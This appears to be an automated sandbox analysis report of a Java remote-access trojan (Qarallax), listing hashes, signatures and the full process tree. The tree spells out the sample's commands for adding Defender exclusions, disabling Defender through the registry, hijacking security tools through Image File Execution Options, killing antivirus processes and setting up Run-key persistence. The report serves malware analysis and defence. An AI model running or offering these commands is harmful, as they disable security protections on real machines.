Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
19-08-2020 13:26
Static task
static1
Behavioral task
behavioral1
Sample
QAOTATION.jar
Resource
win7v200722
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
QAOTATION.jar
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
QAOTATION.jar
-
Size
399KB
-
MD5
be666fddf4e70621ec1a8fe19348bbc3
-
SHA1
132069951f67e7bd94cfce57a137b9f82ead15ad
-
SHA256
3b7e009a2ca84ce2834f422390a85515b80034e4227c05e7522b274e862c7924
-
SHA512
0ef5796a8bb0913389fefc4c940bd0200189d1227071e6a5a400c55925ee396722fa6107f91f618c9799e339a231ab43a7189378388f0551e2064d2eb9ff62fb
Score
10/10
Malware Config
Signatures
-
Qarallax RAT support DLL 1 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\tnlgdsNVAh6797139551848470080.xml qarallax_dll -
Sets file execution options in registry 2 TTPs
-
Loads dropped DLL 1 IoCs
Processes:
java.exepid process 788 java.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
java.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce java.exe Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\UuvhMEW = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\oWsdf\\MIJPw.class\"" java.exe Key created \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run java.exe Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run\UuvhMEW = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\oWsdf\\MIJPw.class\"" java.exe -
Drops desktop.ini file(s) 4 IoCs
Processes:
java.exeattrib.exeattrib.exedescription ioc process File opened for modification C:\Users\Admin\oWsdf\Desktop.ini java.exe File created C:\Users\Admin\oWsdf\Desktop.ini java.exe File opened for modification C:\Users\Admin\oWsdf\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\oWsdf\Desktop.ini attrib.exe -
Drops file in System32 directory 2 IoCs
Processes:
java.exedescription ioc process File created C:\Windows\System32\dlMRF java.exe File opened for modification C:\Windows\System32\dlMRF java.exe -
Kills process with taskkill 16 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2772 taskkill.exe 2480 taskkill.exe 3380 taskkill.exe 4256 taskkill.exe 2936 taskkill.exe 2416 taskkill.exe 4544 taskkill.exe 4916 taskkill.exe 724 taskkill.exe 4396 taskkill.exe 3992 taskkill.exe 3088 taskkill.exe 3896 taskkill.exe 3784 taskkill.exe 3740 taskkill.exe 4128 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 3904 powershell.exe 3904 powershell.exe 3904 powershell.exe -
Suspicious use of AdjustPrivilegeToken 122 IoCs
Processes:
WMIC.exeWMIC.exedescription pid process Token: SeIncreaseQuotaPrivilege 4024 WMIC.exe Token: SeSecurityPrivilege 4024 WMIC.exe Token: SeTakeOwnershipPrivilege 4024 WMIC.exe Token: SeLoadDriverPrivilege 4024 WMIC.exe Token: SeSystemProfilePrivilege 4024 WMIC.exe Token: SeSystemtimePrivilege 4024 WMIC.exe Token: SeProfSingleProcessPrivilege 4024 WMIC.exe Token: SeIncBasePriorityPrivilege 4024 WMIC.exe Token: SeCreatePagefilePrivilege 4024 WMIC.exe Token: SeBackupPrivilege 4024 WMIC.exe Token: SeRestorePrivilege 4024 WMIC.exe Token: SeShutdownPrivilege 4024 WMIC.exe Token: SeDebugPrivilege 4024 WMIC.exe Token: SeSystemEnvironmentPrivilege 4024 WMIC.exe Token: SeRemoteShutdownPrivilege 4024 WMIC.exe Token: SeUndockPrivilege 4024 WMIC.exe Token: SeManageVolumePrivilege 4024 WMIC.exe Token: 33 4024 WMIC.exe Token: 34 4024 WMIC.exe Token: 35 4024 WMIC.exe Token: 36 4024 WMIC.exe Token: SeIncreaseQuotaPrivilege 4024 WMIC.exe Token: SeSecurityPrivilege 4024 WMIC.exe Token: SeTakeOwnershipPrivilege 4024 WMIC.exe Token: SeLoadDriverPrivilege 4024 WMIC.exe Token: SeSystemProfilePrivilege 4024 WMIC.exe Token: SeSystemtimePrivilege 4024 WMIC.exe Token: SeProfSingleProcessPrivilege 4024 WMIC.exe Token: SeIncBasePriorityPrivilege 4024 WMIC.exe Token: SeCreatePagefilePrivilege 4024 WMIC.exe Token: SeBackupPrivilege 4024 WMIC.exe Token: SeRestorePrivilege 4024 WMIC.exe Token: SeShutdownPrivilege 4024 WMIC.exe Token: SeDebugPrivilege 4024 WMIC.exe Token: SeSystemEnvironmentPrivilege 4024 WMIC.exe Token: SeRemoteShutdownPrivilege 4024 WMIC.exe Token: SeUndockPrivilege 4024 WMIC.exe Token: SeManageVolumePrivilege 4024 WMIC.exe Token: 33 4024 WMIC.exe Token: 34 4024 WMIC.exe Token: 35 4024 WMIC.exe Token: 36 4024 WMIC.exe Token: SeIncreaseQuotaPrivilege 3160 WMIC.exe Token: SeSecurityPrivilege 3160 WMIC.exe Token: SeTakeOwnershipPrivilege 3160 WMIC.exe Token: SeLoadDriverPrivilege 3160 WMIC.exe Token: SeSystemProfilePrivilege 3160 WMIC.exe Token: SeSystemtimePrivilege 3160 WMIC.exe Token: SeProfSingleProcessPrivilege 3160 WMIC.exe Token: SeIncBasePriorityPrivilege 3160 WMIC.exe Token: SeCreatePagefilePrivilege 3160 WMIC.exe Token: SeBackupPrivilege 3160 WMIC.exe Token: SeRestorePrivilege 3160 WMIC.exe Token: SeShutdownPrivilege 3160 WMIC.exe Token: SeDebugPrivilege 3160 WMIC.exe Token: SeSystemEnvironmentPrivilege 3160 WMIC.exe Token: SeRemoteShutdownPrivilege 3160 WMIC.exe Token: SeUndockPrivilege 3160 WMIC.exe Token: SeManageVolumePrivilege 3160 WMIC.exe Token: 33 3160 WMIC.exe Token: 34 3160 WMIC.exe Token: 35 3160 WMIC.exe Token: 36 3160 WMIC.exe Token: SeIncreaseQuotaPrivilege 3160 WMIC.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
java.exepid process 788 java.exe -
Suspicious use of WriteProcessMemory 382 IoCs
Processes:
java.execmd.execmd.execmd.exedescription pid process target process PID 788 wrote to memory of 1820 788 java.exe cmd.exe PID 788 wrote to memory of 1820 788 java.exe cmd.exe PID 788 wrote to memory of 668 788 java.exe cmd.exe PID 788 wrote to memory of 668 788 java.exe cmd.exe PID 668 wrote to memory of 4024 668 cmd.exe WMIC.exe PID 668 wrote to memory of 4024 668 cmd.exe WMIC.exe PID 788 wrote to memory of 3596 788 java.exe cmd.exe PID 788 wrote to memory of 3596 788 java.exe cmd.exe PID 3596 wrote to memory of 3160 3596 cmd.exe WMIC.exe PID 3596 wrote to memory of 3160 3596 cmd.exe WMIC.exe PID 788 wrote to memory of 3700 788 java.exe attrib.exe PID 788 wrote to memory of 3700 788 java.exe attrib.exe PID 788 wrote to memory of 2396 788 java.exe attrib.exe PID 788 wrote to memory of 2396 788 java.exe attrib.exe PID 788 wrote to memory of 2788 788 java.exe attrib.exe PID 788 wrote to memory of 2788 788 java.exe attrib.exe PID 788 wrote to memory of 2884 788 java.exe attrib.exe PID 788 wrote to memory of 2884 788 java.exe attrib.exe PID 788 wrote to memory of 3124 788 java.exe attrib.exe PID 788 wrote to memory of 3124 788 java.exe attrib.exe PID 788 wrote to memory of 3784 788 java.exe attrib.exe PID 788 wrote to memory of 3784 788 java.exe attrib.exe PID 788 wrote to memory of 496 788 java.exe attrib.exe PID 788 wrote to memory of 496 788 java.exe attrib.exe PID 788 wrote to memory of 572 788 java.exe attrib.exe PID 788 wrote to memory of 572 788 java.exe attrib.exe PID 788 wrote to memory of 1472 788 java.exe cmd.exe PID 788 wrote to memory of 1472 788 java.exe cmd.exe PID 788 wrote to memory of 3992 788 java.exe taskkill.exe PID 788 wrote to memory of 3992 788 java.exe taskkill.exe PID 788 wrote to memory of 3904 788 java.exe powershell.exe PID 788 wrote to memory of 3904 788 java.exe powershell.exe PID 788 wrote to memory of 3516 788 java.exe reg.exe PID 788 wrote to memory of 3516 788 java.exe reg.exe PID 788 wrote to memory of 3864 788 java.exe reg.exe PID 788 wrote to memory of 3864 788 java.exe reg.exe PID 788 wrote to memory of 2468 788 java.exe reg.exe PID 788 wrote to memory of 2468 788 java.exe reg.exe PID 788 wrote to memory of 752 788 java.exe reg.exe PID 788 wrote to memory of 752 788 java.exe reg.exe PID 788 wrote to memory of 948 788 java.exe reg.exe PID 788 wrote to memory of 948 788 java.exe reg.exe PID 788 wrote to memory of 3820 788 java.exe reg.exe PID 788 wrote to memory of 3820 788 java.exe reg.exe PID 788 wrote to memory of 2408 788 java.exe reg.exe PID 788 wrote to memory of 2408 788 java.exe reg.exe PID 788 wrote to memory of 2348 788 java.exe reg.exe PID 788 wrote to memory of 2348 788 java.exe reg.exe PID 788 wrote to memory of 3228 788 java.exe reg.exe PID 788 wrote to memory of 3228 788 java.exe reg.exe PID 1472 wrote to memory of 1244 1472 cmd.exe reg.exe PID 1472 wrote to memory of 1244 1472 cmd.exe reg.exe PID 788 wrote to memory of 4056 788 java.exe reg.exe PID 788 wrote to memory of 4056 788 java.exe reg.exe PID 788 wrote to memory of 3844 788 java.exe reg.exe PID 788 wrote to memory of 3844 788 java.exe reg.exe PID 788 wrote to memory of 1236 788 java.exe reg.exe PID 788 wrote to memory of 1236 788 java.exe reg.exe PID 788 wrote to memory of 720 788 java.exe reg.exe PID 788 wrote to memory of 720 788 java.exe reg.exe PID 788 wrote to memory of 3800 788 java.exe reg.exe PID 788 wrote to memory of 3800 788 java.exe reg.exe PID 1472 wrote to memory of 1004 1472 cmd.exe reg.exe PID 1472 wrote to memory of 1004 1472 cmd.exe reg.exe -
Views/modifies file attributes 1 TTPs 8 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 572 attrib.exe 3700 attrib.exe 2396 attrib.exe 2788 attrib.exe 2884 attrib.exe 3124 attrib.exe 3784 attrib.exe 496 attrib.exe
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\QAOTATION.jar1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:788 -
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1820
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4024
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3596 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3160
-
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
PID:3700
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
PID:2396
-
-
C:\Windows\SYSTEM32\attrib.exeattrib -s -r C:\Users\Admin\oWsdf\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:2788
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +s +r C:\Users\Admin\oWsdf\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:2884
-
-
C:\Windows\SYSTEM32\attrib.exeattrib -s -r C:\Users\Admin\oWsdf2⤵
- Views/modifies file attributes
PID:3124
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +s +r C:\Users\Admin\oWsdf2⤵
- Views/modifies file attributes
PID:3784
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +h C:\Users\Admin\oWsdf2⤵
- Views/modifies file attributes
PID:496
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +h +s +r C:\Users\Admin\oWsdf\MIJPw.class2⤵
- Views/modifies file attributes
PID:572
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1244
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1004
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
PID:3992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\oWsdf','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\oWsdf\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3904
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:3516
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:3864
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2468
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:752
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:948
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:3820
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:2408
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2348
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:3228
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4056
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:3844
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1236
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:720
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:3800
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
PID:2936
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4000
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4032
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2976
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1816
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1404
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:3784
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4024
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:643⤵PID:3032
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:323⤵PID:1808
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
PID:3088
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2124
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:3196
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:3392
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2144
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵PID:3440
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵PID:1004
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3704
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:643⤵PID:2252
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:323⤵PID:2484
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
PID:2772
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2788
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:643⤵PID:2304
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:323⤵PID:1752
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:484
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:643⤵PID:2372
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:323⤵PID:4028
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2656
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:643⤵PID:668
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:323⤵PID:2424
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3876
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:643⤵PID:3740
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:323⤵PID:3196
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3392
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:643⤵PID:3708
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:323⤵PID:2036
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:948
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:643⤵PID:1816
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:323⤵PID:2764
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:3896
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1752
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:643⤵PID:3992
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:323⤵PID:1808
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3216
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:643⤵PID:3740
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:323⤵PID:1708
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:572
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:643⤵PID:3700
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:323⤵PID:3096
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4056
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:643⤵PID:3900
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:323⤵PID:2144
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3028
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:643⤵PID:2392
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:323⤵PID:1716
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3748
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:643⤵PID:3052
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:323⤵PID:620
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1400
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:643⤵PID:2296
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:323⤵PID:3992
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3100
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:643⤵PID:3300
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:323⤵PID:3988
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
PID:3740
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:724
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:643⤵PID:732
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:323⤵PID:2764
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:620
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:643⤵PID:3992
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:323⤵PID:3064
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2124
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:643⤵PID:1404
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:323⤵PID:3720
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4032
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:643⤵PID:488
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:323⤵PID:1776
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3196
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:643⤵PID:1480
-
-
